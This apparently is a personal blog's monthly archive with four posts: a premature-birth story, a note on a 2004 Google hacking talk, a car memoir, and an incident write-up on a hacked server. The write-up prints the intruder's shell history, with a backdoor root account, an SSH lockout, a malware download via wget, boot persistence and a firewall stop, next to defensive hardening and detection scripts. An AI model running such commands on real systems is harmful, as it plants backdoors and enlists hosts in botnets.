Archive | September, 2014

What It’s Like To Be The Father Of A Premature Baby (Premie)

Pregnancy itself is a roller-coaster, even the ideal pregnancy I would imagine is quite a stressful experience for the first time parents (especially the one with a tiny human growing in her belly). We honestly did not have the easiest pregnancy, at some points it was downright terrifying – especially seeing blood during the exact time when we were supposed to announce to the World that we were having a baby. The magical 3 months mark – Red tide.

And yes it happened again in May, not a good sign, but nothing we could do – nothing the Doctor could tell us..and upon reading far too much, is fairly normal (happens to about 20% of pregnant women). The only bad part, was it’s a fairly strong indicator of premature birth.

There’s 2 things in life I really strongly dislike, complaining and worrying (almost the same thing in fact..). Worry is pointless, if you can do something about it, do it. If you can’t, worrying isn’t going to change anything. Same for complaining, don’t complain, do something to change it, fix the situation, take action – don’t just whinge.

A lot of it can be alleviated by knowledge anyway, read, read, educate yourself and it becomes a lot easier to not worry (or the opposite sometimes when you read too much). Anyway, that’s my philosophy in life and I had to work extra hard to maintain it at certain points during the pregnancy, as it wasn’t an easy one in general.

On the whole it was wonderful though, Kim felt great and she was a glowing, beautiful, vibrant surprise pregnant lady (we consider a surprise mom when you see a hot chick from the back and she turns to the side or around and boom there’s a massive baby bump). She had very few serious symptoms, some morning sickness early on, no really crazy cravings, not much pain/discomfort. Other than the blood etc, it was a textbook pleasant pregnancy.

It was pretty stressful though, every day without blood was a blessing. Then things escalated fairly quickly, 11th July (around 29 weeks gestation) we had ‘The Show’ which is technically the body of the mother saying it’s ready to party, let’s get the baby out. I saw what looked an awful lot like a mucus plug (yes I Google Imaged it..I don’t recommend doing that).

This is when I started reading voraciously about all kinds of symptoms, probabilities, birth stages (micro preemies, early preemies, moderately premature etc etc), and was hoping we could make it to at least 34-35 weeks gestation as our little man would be pretty much fully developed by then and fairly well equipped to come out.

After ‘The Show’ we went to A&E and called our Doctor in to check things out, she said the cervix was a little soft and having a look at the picture of the mucus plug..she said it did very much look like a show and we needed to take precautions for premature birth – which is basically 2 steroids shots 12 hours apart to help along the lung development of the little one when he comes out.

As far as babies go, all systems are pretty much go from 28 weeks onwards, but the lungs are last to develop and be ready to take in outside air. Preemie lungs have issues due to a lack of surfactant which basically lubricates all the little tubes and stops them collapsing.

Most premature babies are born with some kind of respiratory distress (which is why you see them on breathing apparatus). Anyway the earliest preemie stage which is unlikely to have any serious long term effects is 32 weeks, also has a 98% survival rate – which is good obviously.

Anyway after the steroid shots Kim just took it easy and was pretty much on bed rest, not moving a whole lot. We were just hoping and praying (in a non-religious way) that he would stay in as long as possible, as the last few weeks of gestation are when there is exponential growth and development of the body, brain, immune system, nervous system and much more.

So yah, July 30th I was supposed to go to the office, but Kim didn’t seem to be feeling too well, and I just had a bad feeling and thought I should stay at home. Lucky I did as the missus stayed in bed all day, she went to pee around 5pm and I heard a scream from upstairs.

I rushed up and found a wet floor..which I examined closely (yes I smelt it)…you smell it to make sure it’s not pee, to make sure it has no foul smells and you check it to make sure it’s clear and has no black/green tint. A black/green tint would indicate the baby is not coping well and needs to come out ASAP (emergency C-section).

The water had broken, but it didn’t seem to be a can read this part from Kim’s perspective too here: I have popped and this is how it went down..

Anyway, however little or much water broke (I suspected it was the hind waters, not the main sack) we rushed to the hospital and went straight into a labour room. I read up and found the probability of going into labour in the next 24 hours was 50% or higher. I was hoping we were in the other 50% that could go 4-6 weeks with a drip/leak/hind water burst as amniotic fluid does constantly regenerate and after an ultrasound the main sac was still full.

Stay positive and all that, I hung out in the hospital till about 3am then went home to get some sleep. There were no contractions or major dilation (around 1cm) so we were hopeful that he could stay in until at least 36 weeks.

But no, he wasn’t having any of it. I got a panicked call from Kim around 10am saying it was on, she was having major contractions and they’d started at about 5.30am and were getting closer and stronger.

I decided I should probably go into the hospital, so I packed the bag full of stuff we might need and off I went.

It was all very sudden, we seriously had nothing ready – we had a stroller and a car seat I bought because I saw the exact model we wanted on sale. But literally nothing else, no clothes, no diapers, no cot, nothing.

I got to the hospital and Kim was already super drowsy from the gas and air she was sucking on like a crack pipe, she wouldn’t let it go. I have to say, that contraction business looks bloody painful. By about 11am she was screaming for an epidural, but the Doctor said it was too late, she was already 6cm dilated (so 60% of the way there), her contractions were too close together and she was progressing that fast it was going to be over soon anyway.

She was grabbing my hand so hard my fingers almost dropped off (ribena purple they were), but hey, I was happy to bear that rather than pooping out a 2kg human from any of my body orifices.

Things went pretty fast and our son was born pretty smoothly at 1.52pm July 31st 2014 without complications at 32 weeks 4 days (other than him being almost 8 weeks early) his due date was September 22nd. So yah, he was supposed to be born yesterday (relative to when this post was written).

But as someone so wonderfully put it, this way we get to spend an extra 2 months with him!

Seeing your wife give birth naturally (or even cesarean I would imagine) is not an experience for the faint hearted, government hospitals no longer let the fathers be present during birth as they just don’t have enough resources to deal with all the fainting/puking etc.

Thankfully my constitution is ok I think as I managed to stay conscious throughout the entire thing, and didn’t puke and even took some pictures of ‘that’ moment. Although I wasn’t exactly looking directly, so I think they are blur/overexposed haha.

This is how he looked when he was born, covered in the waxy vernix layer, goo and blood having any residual amniotic fluid/gunk sucked out of his nose/mouth with a tube wrapped in a plastic bag to keep him warm. The first thing he did? Peed on the nurse – good lad! Not exactly cute at this stage tho.

32 Week Old Premature Baby

Kim was fine afterwards just tired, she had a sleep and I went to see baby Liam in NICU (neonatal intensive care unit) where we spent many hours for the next 3 and a half weeks. More about that later, I took her up to see him the same day so they could meet the day he was born. We couldn’t hold him yet though as he was still on the CPAP machine (Continuous Positive Airway Pressure) as he did have some respiratory distress.

So the first time mommy and me could hold him was the first day after his birth. He even opened his eyes a bit and grabbed my finger like a little boss, we were so proud that he was already off the CPAP and onto the regular nasal prongs. Far cuter, like a little wrinkly old man.

32 Week Preemie

So yah, that’s the story of our pregnancy and birth from my perspective, and the first thoughts/feeling of being the father of a premature baby. My #32weeker 🙂

If you want to see far too much of him, just follow me on Instagram @ShaolinTiger and his Mommy at @Kimberzilla.


Advanced Information Gathering AKA Google Hacking at HITB 2004

So this was the first real talk I gave, I’d just moved to Malaysia not long beforehand and I’d started work at NSS as the lead for the penetration testing team. We were a sponsor of Hack in the Box 2004 so we got a speakers slot, but it couldn’t be a product/company pitch it had to be a proper infosec/technical talk which passed the regular CFP (Call for paper) requirements.

It was decided that I give the talk..I was very nervous as you can imagine, even back then it was rather a large conference, and this was my first real shot at talking. Looking back at the slides 10 years later though, I think I did a pretty good job – much of the information is still relevant today.

And when I gave the talk the room was packed, people were standing and listening. I think because it was actually one of the less technical talks, more people could enjoy it – it went down really well. The subject was something I did at work, and often the first stage in a penetration test – information gathering. Arguably it’s also the most important phase as it gives you all the entry points and people to target in later phases. The hot keywords at that time were Google Hacking and the GHDB (Google Hacks Database).

Information Gathering AKA Google Hacking

It was about 6 years after this that I gave my next talk, not sure why – perhaps just lack of opportunity. I also did an interview with The Star afterwards titled Guarding against Google hacking, where I met Chris Chong.

Google Hacking - The Star

The talk covers the lesser known aspects of Google, tools such as Athena and Sitedigger and the amount of random misconfiguration that can be found with a little careful search engine manipulation. Other useful public databases will be covered with some details on how to leverage the maximum amount of detail on any given target.

Also an introduction to the Google API and how it can be used or abused during a penetration test or hack attempt. This presentation will include a live demonstration in which the above techniques will be used to gather coveted information about both random and targeted organizations.

So here are the slides:

And the video (yah we had recordings back then, shared via Torrent!):


You can see all my talks given here.


An Anatomy Of A Hack – Weak ROOT Password

So a peaceful Sunday night, I get an odd bandwidth warning for a development/testing server that a developer recently created. It was doing some fairly immense traffic, peaking at 80mb a second and averaging about 8mb/s – definitely not normal.


I tried to access the server via SSH but couldn’t connect at all, port 22 was connection reset by peer (which indicates a block or drop) and our normal port wasn’t responding at all.

I accessed the server via the Linode LISH console, but it wasn’t accepting any of our secure passwords, so I shut it down and used the Linode manager to reset the root password. This then allowed me to boot it up and access it via LISH with the root user.

What I discovered next was the reason why I couldn’t SSH in either on port 22 the default port, or our regular SSH port (which is not 22). I could see from these lines in the .bash_history for root that SSH had been blocked for everyone except 2 IP addresses.

Which would prevent any SSH access at all.

So they logged in, created a user called restart, blocked everyone but 2 IP addresses from accessing via SSH, then downloaded a piece of malware (or what I assume to be a botnet client) from the first IP address.

Then they ran this, and added it to /etc/rc.local to make sure it runs on restart. Here’s the full history:

1 w
2 uname -a
3 ethtool eth0
4 ifconfiog
5 ifconfig
6 last
7 useradd -g 0 -u 0 -o restart
8 echo restart:restart |chpasswd
9 echo "sshd:" >> /etc/hosts.allow
10 echo "sshd:" >> /etc/hosts.allow
11 echo "sshd:ALL" >> /etc/hosts.deny
12 cd /tmp/scp
13 ls
14 chmod 777 *
15 ./x 5.153
16 ls
17 chmod 777 *
18 ./x 5.153
19 cd /etc
20 wget
21 chmod 0755 com
22 ./com &
23 chattr +i com
24 echo "cd /root/">>/etc/rc.local
25 echo "./com&">>/etc/rc.local
26 echo "/etc/init.d/iptables stop">>/etc/rc.local
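The history above leaves three things on disk that can be checked without trusting the running system: a second UID 0 account, a tcp_wrappers rule denying sshd to everyone, and boot-time lines in rc.local. The following triage sketch is an added example, not part of the original post; the file contents are constructed samples modelled on the commands in the history, and the function names are hypothetical.

```python
import re

# Constructed samples of what the commands in the history would leave behind.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
deploy:x:1000:1000::/home/deploy:/bin/bash
restart:x:0:0::/home/restart:/bin/sh
"""
HOSTS_DENY = """\
# /etc/hosts.deny
sshd:ALL
"""
RC_LOCAL = """\
#!/bin/sh -e
cd /root/
./com&
/etc/init.d/iptables stop
exit 0
"""


def extra_uid0_accounts(passwd_text):
    """Accounts other than root with UID 0 (what 'useradd -u 0 -o' creates)."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names


def sshd_lockout_rules(hosts_deny_text):
    """hosts.deny rules of the form 'daemons : clients' denying sshd to ALL."""
    rules = []
    for raw in hosts_deny_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if ":" not in line:
            continue
        daemons, clients = (part.strip() for part in line.split(":")[:2])
        names = {d.lower() for d in re.split(r"[,\s]+", daemons) if d}
        if names & {"sshd", "all"} and clients.upper().startswith("ALL"):
            rules.append(line)
    return rules


def risky_rc_local_lines(rc_local_text):
    """Boot-time lines that background a process or stop the firewall."""
    flagged = []
    for raw in rc_local_text.splitlines():
        cmd = raw.strip()
        if not cmd or cmd.startswith("#"):
            continue
        if cmd.endswith("&") or re.search(r"iptables\s+(stop|-F)", cmd):
            flagged.append(cmd)
    return flagged


def triage(passwd_text, hosts_deny_text, rc_local_text):
    return {
        "uid0_accounts": extra_uid0_accounts(passwd_text),
        "sshd_lockout": sshd_lockout_rules(hosts_deny_text),
        "rc_local": risky_rc_local_lines(rc_local_text),
    }
```

On a real host, read the three files from the mounted disk or rescue console and pass their text in. The file made immutable with chattr +i in the history will show the i flag in lsattr output and needs chattr -i before it can be removed.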

I uploaded the malware to VirusTotal to scan it and see what it turned up:

VirusTotal Scan

The only decent description I found was from Telus:

Backdoor.Linux.Ganiw.A is a Backdoor and Bot agent that targets the Linux platform. The malware contacts a remote server, identifying itself, and sending system information. In addition, it receives control commands to perform various nefarious activities on the infected system. Moreover, the malware has the capabilities to embark on different types of DoS attacks. To survive a system reboot, it adds an entry to the initialization directory “/etc/init.d”.

As for the actual entry, it seems like the password was popped by a different IP address (Also from China), and then later on the same day, it was logged into by our main IP address.

Aug 30 01:46:43 li737-216 sshd[20132]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:45 li737-216 sshd[20134]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:46:47 li737-216 sshd[20134]: Failed password for root from port 4670 ssh2
Aug 30 01:46:58 li737-216 sshd[20134]: message repeated 5 times: [ Failed password for root from port 4670 ssh2]
Aug 30 01:46:58 li737-216 sshd[20134]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:00 li737-216 sshd[20136]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:01 li737-216 sshd[20136]: Failed password for root from port 4526 ssh2
Aug 30 01:47:12 li737-216 sshd[20136]: message repeated 5 times: [ Failed password for root from port 4526 ssh2]
Aug 30 01:47:12 li737-216 sshd[20136]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:14 li737-216 sshd[20138]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:15 li737-216 sshd[20138]: Failed password for root from port 3781 ssh2
Aug 30 01:47:25 li737-216 sshd[20138]: message repeated 5 times: [ Failed password for root from port 3781 ssh2]
Aug 30 01:47:25 li737-216 sshd[20138]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:27 li737-216 sshd[20140]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:29 li737-216 sshd[20140]: Failed password for root from port 4405 ssh2
Aug 30 01:47:39 li737-216 sshd[20140]: message repeated 5 times: [ Failed password for root from port 4405 ssh2]
Aug 30 01:47:39 li737-216 sshd[20140]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:41 li737-216 sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:44 li737-216 sshd[20144]: Failed password for root from port 1662 ssh2
Aug 30 01:47:54 li737-216 sshd[20144]: message repeated 5 times: [ Failed password for root from port 1662 ssh2]
Aug 30 01:47:54 li737-216 sshd[20144]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:55 li737-216 sshd[20146]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost= user=root
Aug 30 01:47:57 li737-216 sshd[20146]: Failed password for root from port 4220 ssh2
Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2

Then the login:

Aug 30 01:47:57 li737-216 sshd[20146]: Accepted password for root from port 4220 ssh2
Aug 30 10:17:56 li737-216 sshd[21293]: Accepted password for root from port 3117 ssh2
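The pattern in this log, a run of failed root passwords ending in an accepted one from the same source, can be detected automatically. The sketch below is an added example, not part of the original post; the sample lines are constructed in the same format, with documentation-range addresses standing in for the source IPs that are absent from the log above.

```python
import re
from collections import defaultdict

# Constructed sample; 203.0.113.7, 198.51.100.9 and 192.0.2.44 are placeholders.
SAMPLE_LOG = """\
Aug 30 01:47:41 host sshd[20144]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=203.0.113.7  user=root
Aug 30 01:47:44 host sshd[20144]: Failed password for root from 203.0.113.7 port 1662 ssh2
Aug 30 01:47:54 host sshd[20144]: message repeated 5 times: [ Failed password for root from 203.0.113.7 port 1662 ssh2]
Aug 30 01:47:57 host sshd[20146]: Failed password for root from 203.0.113.7 port 4220 ssh2
Aug 30 01:47:57 host sshd[20146]: Accepted password for root from 203.0.113.7 port 4220 ssh2
Aug 30 09:02:10 host sshd[21001]: Failed password for invalid user admin from 198.51.100.9 port 5000 ssh2
Aug 30 10:17:56 host sshd[21293]: Accepted password for root from 192.0.2.44 port 3117 ssh2
"""

EVENT = re.compile(
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
REPEATED = re.compile(r"message repeated (?P<n>\d+) times: \[")
STAMP = re.compile(r"^(\w{3}\s+\d+ [\d:]{8})")


def find_guessed_logins(log_text, min_failures=5):
    """Return accepted password logins that follow at least min_failures
    failed passwords from the same source address."""
    failures = defaultdict(int)
    hits = []
    for line in log_text.splitlines():
        event = EVENT.search(line)
        if not event:
            continue
        ip, user = event["ip"], event["user"]
        if event["result"] == "Failed":
            # syslog collapses identical lines into "message repeated N times";
            # count the collapsed attempts instead of treating them as one.
            rep = REPEATED.search(line)
            failures[ip] += int(rep["n"]) if rep else 1
        elif failures[ip] >= min_failures:
            stamp = STAMP.match(line)
            hits.append({
                "time": stamp.group(1) if stamp else "",
                "user": user,
                "source": ip,
                "failures_before": failures[ip],
            })
            failures[ip] = 0  # start a fresh count after reporting
    return hits
```

A later login from a second address, like the 10:17:56 entry above, is not flagged by this check on its own; it has to be correlated with the earlier hit for the same account.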

As a rule I disable root login via SSH, move it to a different port (not 22), disable password based logins, and use a limited list of users that can access SSH. This makes it pretty secure and can be done with the following SSH settings:

Port 888
PermitRootLogin no
PasswordAuthentication no

Then restart SSHd of course. Generally choose a port below 1024, as then it’s still a privileged port and can’t be hijacked by a non-root user (for the paranoid).
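A way to check a server's sshd_config against the settings above, as an added example that is not part of the original post. It assumes the "limited list of users" is expressed with OpenSSH's AllowUsers or AllowGroups directive; the three config samples are constructed and "deploy" is a placeholder account name.

```python
# Constructed samples: a weak config, the post's settings plus an allow-list,
# and one where an earlier line silently overrides the hardened value.
WEAK = """\
Port 22
PermitRootLogin yes
#PasswordAuthentication no
"""
AS_IN_POST = """\
Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers deploy
"""
SHADOWED = """\
PasswordAuthentication yes
Port 888
PermitRootLogin no
PasswordAuthentication no
AllowUsers deploy
"""


def effective_settings(config_text):
    """Global settings as sshd resolves them: the first value read for a
    keyword wins and Port may repeat. Match blocks are conditional overrides
    and are not evaluated here, so parsing stops at the first one."""
    settings, ports = {}, []
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        if key == "port" and value.isdigit():
            ports.append(int(value))
        else:
            settings.setdefault(key, value)
    settings["port"] = ports or [22]  # sshd listens on 22 when Port is unset
    return settings


def audit(config_text):
    """Return the keywords that differ from the hardening described above."""
    s = effective_settings(config_text)
    findings = []
    if 22 in s["port"]:
        findings.append("port")
    if s.get("permitrootlogin", "").lower() != "no":
        findings.append("permitrootlogin")
    # PasswordAuthentication defaults to yes, so an unset value counts as enabled.
    if s.get("passwordauthentication", "yes").lower() != "no":
        findings.append("passwordauthentication")
    if not (s.get("allowusers") or s.get("allowgroups")):
        findings.append("allowusers")
    return findings
```

The SHADOWED sample is the case worth remembering: appending `PasswordAuthentication no` to a file that already sets it to yes further up changes nothing, because sshd keeps the first value.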

This server was only 11 days old, fortunately it has nothing important on it and doesn’t have access to anything else. Just be warned, even if you are disabling root login later, put a secure password in from the you might forget about the server for a while.

And then it’ll get owned by some Chinese hacker and turned into part of their botnet for hire.

There’s really not ever any excuse to have a weak root password.


Oldskool Car Porn: The 1990 Lotus Carlton

I can never forget this car, seriously. My uncle drove a lot for work, I never knew exactly what he did, but he was the first person I knew that owned a laptop. He worked in some kind of manufacturing industry and was possibly a rep/salesman.

Which suits this car, well the original version anyway – the rather boring Vauxhall Carlton (along with the Ford Sierra) was a stock 90s salesman car.

1986 Vauxhall Carlton

Certainly not the most exciting car on the block. Until 1990 anyway.

I remember my uncle was looking for a new car and I happened to join him as he’d found a Lotus Carlton he’d like to look at, he didn’t know much about the car, and well nor did I. There wasn’t a whole lot of Internet back then, and there certainly wasn’t the abundance of information on sites like Wikipedia. It just so happened the car he wanted to look at was near where I lived, so he was coming down from Birmingham to have a look. I’d guess this was probably around 1992-1994 period, so the car was likely new, or barely used (1-2 years old).

When I saw it, I was that it? I was pretty underwhelmed to be honest. For a £48,000 car (which was an enormous amount of money back then).

Lotus Carlton

Even the interior was kind of drab, dull and plasticy. It just had the odd Lotus emblem here and there.

Lotus Carlton Interior

Little did I realise this was a 377bhp, 3.6L twin turbo BEAST which could reach 100mph (160km/h) in less than 17 seconds. So we sat in it, took it for a test drive. It seemed fairly ordinary as we tootled around, then we reached the sliproad to the motorway.

We weren’t going slow, my uncle was in third gear as he reached the merge and he accelerated hard to pull onto the motorway at a decent speed (as you would)..the car span its wheels like a drag bike on a leash.

And once it found grip…it pressed my head so hard into the back of the seat I thought my eyeballs were going to collapse. It was quite an eye watering ride.

And yah, at that point I realised this car was really something special. I read whatever I could about it and was amazed to find that it could outperform the top supercars of that era like the Ferrari Testarossa which could do 0-60mph in only 5.3 seconds and had a top speed of 180mph (only 3 mph more than the Carlton!).

For a 4 door sedan..full of people, speeding along like a bullet train. Quite a crazy (and scary) proposition. Also the fact that it was a target for car thieves and criminals as the police didn’t have any cars fast enough to chase it made it a little impractical.

Sadly my uncle didn’t buy the car, so I didn’t get to sit in it (or any other) ever again. There were only 320 Lotus Carltons released in the UK, so it is a rare car. Even now, 20+ years later they are fetching good money for mint condition examples (£12-20,000).

There is a modern day equivalent or a spiritual successor (in some ways), the Vauxhall VXR8.

But yah, something I still remember so vividly from my younger years. Some videos for reference..

Fifth Gear Vauxhall VXR8 vs Lotus Carlton

Top Gear Lotus Carlton

Autocar heroes: Lotus Carlton video review
